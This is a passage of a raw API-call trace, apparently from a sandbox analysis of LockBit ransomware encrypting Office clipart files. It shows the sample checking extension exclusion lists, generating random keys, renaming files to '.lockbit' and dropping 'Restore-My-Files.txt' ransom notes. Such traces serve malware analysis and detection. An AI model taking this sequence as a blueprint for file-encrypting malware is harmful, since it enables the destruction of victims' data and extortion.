lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0144.774] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.775] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.775] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.776] free (_Block=0x1fa2ed8) [0144.776] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.776] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.777] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3094, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152608.WMF", cAlternateFileName="")) returned 1 [0144.777] lstrcmpiW (lpString1=".", lpString2="J0152608.WMF") returned -1 [0144.777] lstrcmpiW (lpString1="..", lpString2="J0152608.WMF") returned -1 [0144.777] PathFindExtensionW (pszPath="J0152608.WMF") returned=".WMF" [0144.777] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.777] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.778] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.778] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152608.WMF") returned 1 [0144.779] lstrcmpiW (lpString1="ntldr", lpString2="J0152608.WMF") returned 1 [0144.779] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152608.WMF") returned 1 [0144.779] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152608.WMF") returned -1 [0144.779] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152608.WMF") returned -1 [0144.779] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152608.WMF") returned 1 [0144.779] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152608.WMF") returned -1 [0144.779] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.779] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned=".WMF" [0144.779] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.779] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.779] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.780] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.780] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.lockbit") returned 72 [0144.780] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0144.781] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.781] malloc (_Size=0x40068) returned 0x3d70450 [0144.782] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=12436) returned 1 [0144.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0144.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0144.783] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0144.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.789] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.789] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.790] free (_Block=0x1fa2ed8) [0144.790] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.790] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.790] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152610.WMF", cAlternateFileName="")) returned 1 [0144.790] lstrcmpiW (lpString1=".", lpString2="J0152610.WMF") returned -1 [0144.791] lstrcmpiW (lpString1="..", lpString2="J0152610.WMF") returned -1 [0144.791] PathFindExtensionW (pszPath="J0152610.WMF") returned=".WMF" [0144.791] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.791] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.792] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.792] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.793] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152610.WMF") returned 1 [0144.794] lstrcmpiW (lpString1="ntldr", lpString2="J0152610.WMF") returned 1 [0144.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152610.WMF") returned 1 [0144.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152610.WMF") returned -1 [0144.794] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152610.WMF") returned -1 [0144.794] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152610.WMF") returned 1 [0144.794] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152610.WMF") returned -1 [0144.794] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.794] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned=".WMF" [0144.794] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.794] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.794] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.795] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.796] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.796] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.lockbit") returned 72 [0144.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0144.797] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.797] malloc (_Size=0x40068) returned 0x3df0008 [0144.797] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5960) returned 1 [0144.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.798] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.804] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.804] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.806] free (_Block=0x1fa2ed8) [0144.806] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.806] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.806] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2584, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152622.WMF", cAlternateFileName="")) returned 1 [0144.806] lstrcmpiW (lpString1=".", lpString2="J0152622.WMF") returned -1 [0144.806] lstrcmpiW (lpString1="..", lpString2="J0152622.WMF") returned -1 [0144.806] PathFindExtensionW (pszPath="J0152622.WMF") returned=".WMF" [0144.806] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.806] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.807] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.808] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.808] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.809] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152622.WMF") returned 1 [0144.809] lstrcmpiW (lpString1="ntldr", lpString2="J0152622.WMF") returned 1 [0144.809] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152622.WMF") returned 1 [0144.809] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152622.WMF") returned -1 [0144.809] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152622.WMF") returned -1 [0144.809] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152622.WMF") returned 1 [0144.809] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152622.WMF") returned -1 [0144.809] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 